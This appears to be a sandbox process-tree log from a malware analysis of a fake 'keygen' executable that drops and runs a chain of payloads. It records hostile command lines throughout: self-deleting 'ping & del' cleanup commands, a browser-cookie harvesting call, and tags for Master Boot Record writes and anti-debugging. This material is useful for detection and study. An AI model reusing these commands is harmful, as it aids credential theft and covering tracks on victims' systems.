C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"1⤵PID:3956
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat" "2⤵PID:4116
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe"4⤵
- Executes dropped EXE
PID:4980 -
C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4760
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:2884 -
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
PID:4916 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe"4⤵PID:2512
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4772 -
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
PID:2848 -
C:\Users\Admin\AppData\Roaming\4695.tmp.exe"C:\Users\Admin\AppData\Roaming\4695.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4248 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\4695.tmp.exe"5⤵PID:5660
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:5808 -
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-2.exe"4⤵PID:2636
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-2.exe" >> NUL4⤵PID:4372
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:4336 -
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
PID:3340 -
C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2240 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:3676 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe"5⤵PID:3320
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:4944 -
C:\Users\Admin\AppData\Local\Temp\RarSFX5\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4328 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 27165⤵
- Program crash
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"4⤵
- Executes dropped EXE
PID:5768 -
C:\Users\Admin\AppData\Roaming\7A86.tmp.exe"C:\Users\Admin\AppData\Roaming\7A86.tmp.exe"5⤵PID:5180
-
C:\Users\Admin\AppData\Roaming\7A86.tmp.exe"C:\Users\Admin\AppData\Roaming\7A86.tmp.exe"6⤵PID:6120
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"5⤵PID:5804
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5172 -
C:\Users\Admin\AppData\Local\Temp\RarSFX5\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\BTRSetp.exe"4⤵PID:5140
-
C:\Users\Admin\AppData\Local\Temp\RarSFX11\installer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX11\installer.exe"5⤵PID:4408
-
C:\ProgramData\999166.10"C:\ProgramData\999166.10"6⤵PID:1228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 7247⤵
- Program crash
PID:6216 -
C:\ProgramData\6953580.76"C:\ProgramData\6953580.76"6⤵PID:4884
-
C:\ProgramData\2568692.28"C:\ProgramData\2568692.28"6⤵PID:6268
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\gdrrr.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\gdrrr.exe"4⤵PID:6812
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:4488
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6916
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:4340
-
C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"1⤵PID:228
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen.bat" "2⤵PID:7432
-
C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵PID:8444
-
C:\Users\Admin\AppData\Local\Temp\RarSFX32\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX32\key.exe"4⤵PID:5352
-
C:\Users\Admin\AppData\Local\Temp\RarSFX32\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX32\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4588
-
C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-1.exekeygen-step-1.exe3⤵PID:8484
-
C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-3.exekeygen-step-3.exe3⤵PID:8536
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-3.exe"4⤵PID:5748
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4424 -
C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-2.exekeygen-step-2.exe3⤵PID:8528
-
C:\Users\Admin\AppData\Roaming\F5F.tmp.exe"C:\Users\Admin\AppData\Roaming\F5F.tmp.exe"4⤵PID:7644
-
C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-2.exe"4⤵PID:5132
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-2.exe" >> NUL4⤵PID:7952
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:6880 -
C:\Users\Admin\AppData\Local\Temp\RarSFX30\keygen-step-4.exekeygen-step-4.exe3⤵PID:8204
-
C:\Users\Admin\AppData\Local\Temp\RarSFX33\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX33\Setup.exe"4⤵PID:8024
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵PID:7148
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX33\Setup.exe"5⤵PID:6116
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:7312 -
C:\Users\Admin\AppData\Local\Temp\RarSFX33\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX33\md2_2efs.exe"4⤵PID:7960
-
C:\Users\Admin\AppData\Local\Temp\RarSFX33\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX33\file.exe"4⤵PID:964
-
C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"1⤵PID:204
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen.bat" "2⤵PID:4220
-
C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵PID:5644
-
C:\Users\Admin\AppData\Local\Temp\RarSFX14\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX14\key.exe"4⤵PID:5728
-
C:\Users\Admin\AppData\Local\Temp\RarSFX14\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX14\key.exe -txt -scanlocal -file:potato.dat5⤵PID:6280
-
C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-1.exekeygen-step-1.exe3⤵PID:5036
-
C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-2.exekeygen-step-2.exe3⤵PID:832
-
C:\Users\Admin\AppData\Roaming\BAAC.tmp.exe"C:\Users\Admin\AppData\Roaming\BAAC.tmp.exe"4⤵PID:7032
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\BAAC.tmp.exe"5⤵PID:7408
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:7500 -
C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-2.exe"4⤵PID:5996
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-2.exe" >> NUL4⤵PID:5260
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:6296 -
C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-3.exekeygen-step-3.exe3⤵PID:5840
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-3.exe"4⤵PID:6432
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:6772 -
C:\Users\Admin\AppData\Local\Temp\RarSFX12\keygen-step-4.exekeygen-step-4.exe3⤵PID:5828
-
C:\Users\Admin\AppData\Local\Temp\RarSFX15\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX15\Setup.exe"4⤵PID:5128
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵PID:6988
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX15\Setup.exe"5⤵PID:6932
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:7044 -
C:\Users\Admin\AppData\Local\Temp\RarSFX15\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX15\md2_2efs.exe"4⤵PID:7056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 26965⤵
- Program crash
PID:5564 -
C:\Users\Admin\AppData\Local\Temp\RarSFX15\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX15\file.exe"4⤵PID:6272
-
C:\Users\Admin\AppData\Roaming\27CE.tmp.exe"C:\Users\Admin\AppData\Roaming\27CE.tmp.exe"5⤵PID:7880
-
C:\Users\Admin\AppData\Roaming\27CE.tmp.exe"C:\Users\Admin\AppData\Roaming\27CE.tmp.exe"6⤵PID:5632
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX15\file.exe"5⤵PID:7228
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6684 -
C:\Users\Admin\AppData\Local\Temp\RarSFX15\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX15\BTRSetp.exe"4⤵PID:6964
-
C:\Users\Admin\AppData\Local\Temp\RarSFX26\installer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX26\installer.exe"5⤵PID:6292
-
C:\ProgramData\6137021.67"C:\ProgramData\6137021.67"6⤵PID:6524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6524 -s 7247⤵
- Program crash
PID:7776 -
C:\ProgramData\6323886.69"C:\ProgramData\6323886.69"6⤵PID:7720
-
C:\ProgramData\5950860.65"C:\ProgramData\5950860.65"6⤵PID:4580
-
C:\Users\Admin\AppData\Local\Temp\RarSFX15\gdrrr.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX15\gdrrr.exe"4⤵PID:8140
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:4508
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:8260
-
C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"1⤵PID:3380
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen.bat" "2⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵PID:4912
-
C:\Users\Admin\AppData\Local\Temp\RarSFX19\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX19\key.exe"4⤵PID:4616
-
C:\Users\Admin\AppData\Local\Temp\RarSFX19\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX19\key.exe -txt -scanlocal -file:potato.dat5⤵PID:5148
-
C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-1.exekeygen-step-1.exe3⤵PID:5584
-
C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-2.exekeygen-step-2.exe3⤵PID:5960
-
C:\Users\Admin\AppData\Roaming\FA16.tmp.exe"C:\Users\Admin\AppData\Roaming\FA16.tmp.exe"4⤵PID:6832
-
C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-2.exe"4⤵PID:5608
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-2.exe" >> NUL4⤵PID:7132
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:7208 -
C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-3.exekeygen-step-3.exe3⤵PID:5492
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-3.exe"4⤵PID:5196
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:5852 -
C:\Users\Admin\AppData\Local\Temp\RarSFX18\keygen-step-4.exekeygen-step-4.exe3⤵PID:5380
-
C:\Users\Admin\AppData\Local\Temp\RarSFX20\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX20\Setup.exe"4⤵PID:5972
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵PID:6736
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX20\Setup.exe"5⤵PID:7636
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:7760 -
C:\Users\Admin\AppData\Local\Temp\RarSFX20\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX20\md2_2efs.exe"4⤵PID:7680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 33685⤵
- Program crash
PID:4592 -
C:\Users\Admin\AppData\Local\Temp\RarSFX20\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX20\file.exe"4⤵PID:9052
-
C:\Users\Admin\AppData\Roaming\3E3F.tmp.exe"C:\Users\Admin\AppData\Roaming\3E3F.tmp.exe"5⤵PID:2160
-
C:\Users\Admin\AppData\Roaming\3E3F.tmp.exe"C:\Users\Admin\AppData\Roaming\3E3F.tmp.exe"6⤵PID:1972
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX20\file.exe"5⤵PID:6188
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4860 -
C:\Users\Admin\AppData\Local\Temp\RarSFX20\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX20\BTRSetp.exe"4⤵PID:2780
-
C:\Users\Admin\AppData\Local\Temp\RarSFX35\installer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX35\installer.exe"5⤵PID:4528
-
C:\ProgramData\3879103.42"C:\ProgramData\3879103.42"6⤵PID:7068
-
C:\ProgramData\3094693.34"C:\ProgramData\3094693.34"6⤵PID:7908
-
C:\ProgramData\1279603.14"C:\ProgramData\1279603.14"6⤵PID:4704
-
C:\Users\Admin\AppData\Local\Temp\RarSFX20\gdrrr.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX20\gdrrr.exe"4⤵PID:5888
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7648
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7688
-
C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"1⤵PID:5044
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen.bat" "2⤵PID:5116
-
C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵PID:5648
-
C:\Users\Admin\AppData\Local\Temp\RarSFX16\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX16\key.exe"4⤵PID:5964
-
C:\Users\Admin\AppData\Local\Temp\RarSFX16\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX16\key.exe -txt -scanlocal -file:potato.dat5⤵PID:6400
-
C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-1.exekeygen-step-1.exe3⤵PID:2756
-
C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-2.exekeygen-step-2.exe3⤵PID:5232
-
C:\Users\Admin\AppData\Roaming\CE34.tmp.exe"C:\Users\Admin\AppData\Roaming\CE34.tmp.exe"4⤵PID:6884
-
C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-2.exe"4⤵PID:7152
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-2.exe" >> NUL4⤵PID:3096
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:4968 -
C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-3.exekeygen-step-3.exe3⤵PID:6372
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-3.exe"4⤵PID:5624
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\RarSFX13\keygen-step-4.exekeygen-step-4.exe3⤵PID:6560
-
C:\Users\Admin\AppData\Local\Temp\RarSFX17\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX17\Setup.exe"4⤵PID:4820
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵PID:6392
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX17\Setup.exe"5⤵PID:5524
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:1524 -
C:\Users\Admin\AppData\Local\Temp\RarSFX17\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX17\md2_2efs.exe"4⤵PID:5568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5568 -s 27725⤵
- Program crash
PID:7480 -
C:\Users\Admin\AppData\Local\Temp\RarSFX17\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX17\file.exe"4⤵PID:6140
-
C:\Users\Admin\AppData\Roaming\789D.tmp.exe"C:\Users\Admin\AppData\Roaming\789D.tmp.exe"5⤵PID:8132
-
C:\Users\Admin\AppData\Roaming\789D.tmp.exe"C:\Users\Admin\AppData\Roaming\789D.tmp.exe"6⤵PID:6548
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX17\file.exe"5⤵PID:3628
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6728 -
C:\Users\Admin\AppData\Local\Temp\RarSFX17\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX17\BTRSetp.exe"4⤵PID:7404
-
C:\Users\Admin\AppData\Local\Temp\RarSFX31\installer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX31\installer.exe"5⤵PID:8884
-
C:\ProgramData\3933288.43"C:\ProgramData\3933288.43"6⤵PID:7860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 7247⤵
- Program crash
PID:5516 -
C:\ProgramData\7631526.83"C:\ProgramData\7631526.83"6⤵PID:6052
-
C:\ProgramData\3747127.41"C:\ProgramData\3747127.41"6⤵PID:8344
-
C:\Users\Admin\AppData\Local\Temp\RarSFX17\gdrrr.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX17\gdrrr.exe"4⤵PID:3052
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:4308
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:4664
-
C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"C:\Users\Admin\Desktop\CYME.CYMGRD.v6.3.R7.keygen.exe"1⤵PID:5032
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen.bat" "2⤵PID:7968
-
C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵PID:8028
-
C:\Users\Admin\AppData\Local\Temp\RarSFX22\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX22\key.exe"4⤵PID:3936
-
C:\Users\Admin\AppData\Local\Temp\RarSFX22\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX22\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4464
-
C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-1.exekeygen-step-1.exe3⤵PID:8048
-
C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-2.exekeygen-step-2.exe3⤵PID:8068
-
C:\Users\Admin\AppData\Roaming\1F61.tmp.exe"C:\Users\Admin\AppData\Roaming\1F61.tmp.exe"4⤵PID:5028
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\1F61.tmp.exe"5⤵PID:7920
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-2.exe"4⤵PID:2204
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-2.exe" >> NUL4⤵PID:4284
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:7348 -
C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-3.exekeygen-step-3.exe3⤵PID:7308
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-3.exe"4⤵PID:6324
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:8096 -
C:\Users\Admin\AppData\Local\Temp\RarSFX21\keygen-step-4.exekeygen-step-4.exe3⤵PID:7340
-
C:\Users\Admin\AppData\Local\Temp\RarSFX23\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX23\Setup.exe"4⤵PID:6404
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵PID:5052
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX23\Setup.exe"5⤵PID:8100
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:32 -
C:\Users\Admin\AppData\Local\Temp\RarSFX23\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX23\md2_2efs.exe"4⤵PID:6228
-
C:\Users\Admin\AppData\Local\Temp\RarSFX23\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX23\file.exe"4⤵PID:8332
-
C:\Users\Admin\AppData\Roaming\2160.tmp.exe"C:\Users\Admin\AppData\Roaming\2160.tmp.exe"5⤵PID:7128
-
C:\Users\Admin\AppData\Roaming\2160.tmp.exe"C:\Users\Admin\AppData\Roaming\2160.tmp.exe"6⤵PID:8972
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX23\file.exe"5⤵PID:420
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:2444 -
